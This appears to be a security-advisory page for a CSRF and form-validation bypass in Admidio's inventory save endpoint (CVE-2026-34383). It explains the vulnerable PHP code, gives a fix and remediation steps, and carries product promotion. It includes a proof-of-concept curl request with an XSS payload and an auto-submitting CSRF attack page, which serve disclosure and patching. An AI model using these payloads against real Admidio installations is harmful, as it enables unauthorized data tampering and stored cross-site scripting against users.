Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
🐘 Packagist

GHSA-4rwm-c5mj-wh7x

MEDIUM

Admidio has CSRF and Form Validation Bypass in Inventory Item Save via `imported` Parameter

Also known asCVE-2026-34383
Published
Mar 31, 2026
Updated
Mar 31, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed

EPSS Exploitation Probability

via FIRST.org ↗
0.1%probability of exploitation in next 30 days
Lower Risk3th percentile+0.12%
0.00%0.21%0.42%0.63%0.0%0.0%0.0%0.1%Apr 26Jun 26Jun 26

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected
🐘admidio/admidio

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.

Description

Summary

The inventory module's item_save endpoint accepts a user-controllable POST parameter imported that, when set to true, completely bypasses both CSRF token validation and server-side form validation. An authenticated user can craft a direct POST request to save arbitrary inventory item data without CSRF protection and without the field value checks that the FormPresenter validation normally enforces.

Details

In modules/inventory.php, the imported parameter is read from POST input:

File: modules/inventory.php:50

$postImported = admFuncVariableIsValid($_POST, 'imported', 'bool', array('defaultValue' => false));

This is then passed to ItemService:

File: modules/inventory.php:251-256

$itemService = new ItemService($gDb, $itemUuid, $postCopyField, $postCopyNumber, $postImported);
$itemService->save(true);

Inside ItemService::save(), the postImported flag completely skips CSRF and form validation:

File: src/Inventory/Service/ItemService.php:99-109

public function save(bool $multiEdit = false): void
{
    global $gCurrentSession, $gL10n, $gSettingsManager;

    // check form field input and sanitized it from malicious content
    if (!$this->postImported) {
        $itemFieldsEditForm = $gCurrentSession->getFormObject($_POST['adm_csrf_token']);
        $formValues = $itemFieldsEditForm->validate($_POST, $multiEdit);
    } else {
        $formValues = $_POST;   // Raw $_POST used with no CSRF check, no validation
    }
    // ... item data is saved using raw $formValues

When imported=1 is sent, the code:

  1. Skips $gCurrentSession->getFormObject() — which validates the CSRF token
  2. Skips $itemFieldsEditForm->validate() — which sanitizes and validates field values
  3. Uses raw $_POST values directly to save to the database

This means:

  • CSRF protection is completely bypassed — an external website can trick a logged-in user into modifying inventory data
  • Form validation is bypassed — field type checks, required field checks, and input sanitization are all skipped
  • Raw user input flows into $this->itemRessource->setValue() and then saveItemData() without the normal server-side sanitization

PoC

# As an authenticated user with inventory access, save arbitrary item data
# without a valid CSRF token and without form validation:

curl -X POST -b 'ADMIDIO_SESSION=<session>' \
  'https://admidio.local/modules/inventory.php?mode=item_save' \
  -d 'imported=1' \
  -d 'adm_csrf_token=anything' \
  -d 'INF-CATEGORY=1' \
  -d 'INF-ITEMNAME=<script>alert(1)</script>'

# The CSRF token is not checked because imported=true skips the form object lookup.
# The field value is not sanitized because validate() is skipped.

A CSRF attack page would look like:

<html>
<body>
<form action="https://admidio.local/modules/inventory.php?mode=item_save" method="POST">
  <input type="hidden" name="imported" value="1" />
  <input type="hidden" name="adm_csrf_token" value="dummy" />
  <input type="hidden" name="INF-CATEGORY" value="1" />
  <input type="hidden" name="INF-ITEMNAME" value="Attacker-controlled data" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>

Impact

  • CSRF bypass: An attacker can trick any logged-in inventory user into creating or modifying inventory items by having them visit a malicious page.
  • Validation bypass: Server-side field type validation, required field checks, and input sanitization are all skipped, allowing arbitrary data to be stored.
  • Stored XSS potential: Because validate() is bypassed, unsanitized input may be stored and later rendered to other users (dependent on output encoding in the view layer).

Recommended Fix

Remove the imported parameter bypass from the save logic, or at minimum always validate the CSRF token regardless of the imported flag:

public function save(bool $multiEdit = false): void
{
    global $gCurrentSession, $gL10n, $gSettingsManager;

    // ALWAYS validate CSRF token
    $itemFieldsEditForm = $gCurrentSession->getFormObject($_POST['adm_csrf_token']);

    if (!$this->postImported) {
        $formValues = $itemFieldsEditForm->validate($_POST, $multiEdit);
    } else {
        // For imported items, still validate the CSRF token (done above)
        // and apply basic sanitization
        $formValues = $itemFieldsEditForm->validate($_POST, $multiEdit);
    }
    // ...
}

Alternatively, the imported flag should only be set by the import workflow itself (via a session variable set during the import process), rather than being controllable via direct POST input.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
🐘Packagistadmidio/admidioall versions5.0.8

Detection & mitigation playbook

Open-source dependency

  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for admidio/admidio. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update admidio/admidio to 5.0.8 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-4rwm-c5mj-wh7x is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-4rwm-c5mj-wh7x is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-4rwm-c5mj-wh7x. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

## Summary The inventory module's `item_save` endpoint accepts a user-controllable POST parameter `imported` that, when set to `true`, completely bypasses both CSRF token validation and server-side form validation. An authenticated user can craft a direct POST request to save arbitrary inventory item data without CSRF protection and without the field value checks that the `FormPresenter` validation normally enforces. ## Details In `modules/inventory.php`, the `imported` parameter is read from POST input: **File:** `modules/inventory.php:50` ```php $postImported = admFuncVariableIsValid($_P
O3 Security · Impact-Aware SCA

Is GHSA-4rwm-c5mj-wh7x in your dependencies?

O3 detects GHSA-4rwm-c5mj-wh7x across Packagist dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works